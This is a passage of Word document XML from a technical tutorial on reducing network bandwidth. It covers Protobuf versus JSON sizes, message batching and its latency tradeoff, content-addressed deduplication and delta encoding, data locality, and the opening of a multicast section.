      <w:r w:rsidRPr="00487CAD">
        <w:t>protobuf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F375C36" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>// Protobuf (35 bytes) — same data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D93B23" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>[field 1: varint 12345][field 2: "Alice Smith"][field 3: "alice@example.com"][field 4: varint 30][field 5: varint 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBE9E67" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Protobuf is 4–5x smaller than JSON for typical payloads. At scale:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CFDCD1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0556FA19" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>JSON:     10,000 RPS × 150 bytes = 1.5 MB/s = 12 Mbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C53F16" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Protobuf: 10,000 RPS × 35 bytes = 350 KB/s = 2.8 Mbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E121D10" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Savings: 76% less bandwidth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F1C236" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.3 Batching — Amortizing Per-Message Overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B44B77" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem with small messages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBFD066" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Each network packet has fixed overhead regardless of payload size:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAAAD6D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1120"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Ethernet header: 14 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACC01CE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1120"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>IP header: 20 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6E1DCE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1120"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>TCP header: 20 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7A4174" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1120"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>TLS record header: 5 bytes + 16 bytes (MAC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532DBBE8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Total per-packet overhead: ~75 bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8E9909" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>For a 100-byte payload: 75 bytes overhead → 43% overhead. For a 1400-byte payload: 75 bytes overhead → 5% overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2591BB5F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Batching reduces per-message overhead:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CE01D4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Instead of 1000 individual 100-byte messages (1000 packets × 175 bytes = 175 KB): Batch into 10 messages of 10 items (10 packets × 1075 bytes = 10.75 KB):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14290573" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Wait—let's recalculate correctly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C2C1AE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1121"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>1000 individual messages: 1000 × (100 + 75) = 175,000 bytes on the wire.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8CECD4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1121"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>10 batches of 100 messages: 10 × (10,000 + 75) = 100,750 bytes on the wire.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6658D5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1121"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>Savings: 42% less bandwidth (and 99% fewer packets).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546AB8B9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Where batching is used:</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604"/>
        <w:gridCol w:w="2603"/>
        <w:gridCol w:w="3143"/>
      </w:tblGrid>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="72E7D74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3D66C7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>System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9CA467" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Batch Size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5BE187" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Trigger</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="4C11FC8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3A9376" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Kafka producer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37F999" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>16 KB – 1 MB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6F335B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Size or time (linger.ms)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="70C8954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12ACE6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Database bulk inserts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7FE12E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>100–10,000 rows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EE4B39" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Size</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="5A0F500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14DC1A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>gRPC streaming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4CBA91" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>N messages per stream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9E46CF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Application-controlled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="6E32E09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7E4522" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>API batch endpoints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2EF75A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>10–100 operations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D414E9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Client-defined</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="2435636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E01385" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Metrics (Prometheus remote write)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59B48D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>500–10,000 samples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7059E4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Time interval (scrape interval)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F3375FB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The batch size tradeoff:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6441F8EB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1122"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Small batches:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Lower latency (data sent sooner), higher bandwidth overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F74E4D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1122"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Large batches:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Lower bandwidth overhead, higher latency (waiting to fill the batch).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1783AE47" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1122"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Optimal:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Use a combined trigger: send when batch reaches N items OR T milliseconds have elapsed (whichever comes first).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C18627" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.4 Deduplication — Not Sending the Same Data Twice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68444E06" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Content-Addressable Storage (CAS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F721D70" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1123"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Hash the content → if the hash already exists on the remote side, don't send it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E022AF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1123"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Git uses this: objects are addressed by SHA-1 hash. git push only sends objects the remote doesn't have.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9F7AF9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1123"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Docker uses this: image layers are content-addressed. Pushing an image only sends layers the registry doesn't have.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3D95C6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Delta encoding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA79562" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1124"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Send only the DIFFERENCE between the old version and the new version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1AC33D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1124"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>rsync: checksums blocks of the file, sends only changed blocks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C0F810" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1124"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>Database replication (IXFR for DNS, logical replication for PostgreSQL): sends only changed rows, not the entire table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF97638" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CDN cache revalidation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09393E94" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1125"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Client has a cached resource (ETag: "abc123").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74226D88" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1125"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Instead of downloading the full 500 KB file again: If-None-Match: "abc123" → server responds 304 (200 bytes) if unchanged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D0FC54" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1125"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Bandwidth saved: 500 KB → 200 bytes (2500x reduction).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576D2185" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.5 Data Locality — Moving Compute to Data (Not Data to Compute)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10ABC097" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The principle:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> When data is large and computation is small, move the computation to where the data lives rather than moving the data to where the computation is.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28080918" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example — Processing 10 TB of log data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5751A5F3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Option A (move data to compute):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72583903" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D900AD9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Transfer 10 TB over 10 Gbps link = 8,000 seconds = 2.2 hours of transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FCE9E4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Then process locally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A5BF78" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Total: 2.2 hours + processing time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAF5129" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Option B (move compute to data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C96151" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA74EF3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Send a 1 KB query/job to the data node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208C70C2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Process in-place (no data transfer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CE89F5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Return 10 KB of results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8F60C7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Total: processing time only (no transfer delay)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2380BE43" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This principle drives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0FCF82" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1126"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>MapReduce/Spark: ship the function to where the data lives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0298666D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1126"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Database stored procedures: execute logic inside the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9E1FEB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1126"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Edge computing: process IoT data at the edge rather than shipping to cloud.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3B3650" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1126"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>CDN edge functions: run code at CDN PoPs rather than routing to origin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369F97E5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6.6 Multicast and Publish-Subscribe — One-to-Many Efficiency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2392F759" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The bandwidth problem with unicast for one-to-many:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5827CBED" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Server sends an update to 1000 subscribers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C71E97" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
